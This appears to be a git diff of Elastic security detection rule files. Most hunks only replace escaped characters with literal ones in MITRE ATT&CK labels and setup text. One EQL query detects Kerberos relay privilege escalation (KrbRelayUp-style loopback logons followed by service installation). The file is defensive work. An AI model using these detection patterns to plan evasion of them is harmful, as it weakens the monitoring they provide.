[authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port > 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", "references": [ "https://github.com/Dec0ne/KrbRelayUp", "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", 
@@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_105.json b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_105.json index c2019857012..83b572f6b20 100644 --- a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_105.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Creation via Local Kerberos Authentication", - "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port \u003e 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", + "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port > 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", "references": [ "https://github.com/Dec0ne/KrbRelayUp", "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_105.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_105.json index 3e5b97252a2..e566aa96ab9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_105.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_106.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_106.json index 79faeb90e1d..c29db94ea4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_106.json 
+++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_106.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_107.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_107.json index 24995442e7a..c1a6b6f4ed6 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_107.json 
@@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_108.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_108.json index 147978613b7..5b0e40b303e 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_108.json 
@@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_109.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_109.json index ba084babba1..1bf088d7b5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_109.json +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_109.json 
@@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", - "setup": "\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```\n", + "setup": "\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_203.json b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_203.json index b05b82bd59c..234b1f544e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_203.json +++ b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_203.json 
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_204.json b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_204.json
index ed4279308da..57b9ea9c432 100644
--- a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_204.json
+++ b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_204.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_205.json b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_205.json
index 1b1626b9fa8..653f65e794f 100644
--- a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_205.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_101.json b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_101.json
index 245857aa0b2..753dbf476c7 100644
--- a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_101.json
@@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_102.json b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_102.json index 40e91e370f9..110769158ce 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_103.json b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_103.json index d41a7104fdb..f1fab0151c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_104.json b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_104.json index c0c3af88a09..c5c0c78409f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_104.json 
@@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_102.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_102.json index 2a5cd70449e..d7d9e87fa18 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_103.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_103.json index e75eee67df7..19a5e7419fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_104.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_104.json index d3e0ef1f2fa..4b659e01c3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_104.json 
@@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_105.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_105.json index ab22591162e..4d0f6181e1b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_102.json b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_102.json index c32c461e977..ff5b97b4600 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_102.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_103.json b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_103.json index 18ca41ad989..246476bfbf3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_103.json 
@@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_104.json b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_104.json index 84f1b3d48c1..80552901052 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_104.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_205.json b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_205.json index b12c5acb858..14b5d022c55 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_205.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_102.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_102.json index 65169f48f31..a4aee34adb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_102.json 
@@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_103.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_103.json index 04ebd69fdca..05aaace2016 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_103.json 
@@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_104.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_104.json index 41b6b465366..85d92651cf1 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_104.json 
@@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_105.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_105.json index d57a3c38434..673b9984a77 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_105.json 
@@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_106.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_106.json index 9772bdfe259..50b7a07f189 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_106.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_102.json b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_102.json index e91b3536946..c9d31ac0a2c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_103.json b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_103.json index 7e008eaf003..5cf18ae1ff0 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_104.json b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_104.json index 42a42a34887..e22e1ce6404 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_1.json b/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_1.json index 77e6edde69c..7c989bddc32 100644 --- a/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_1.json 
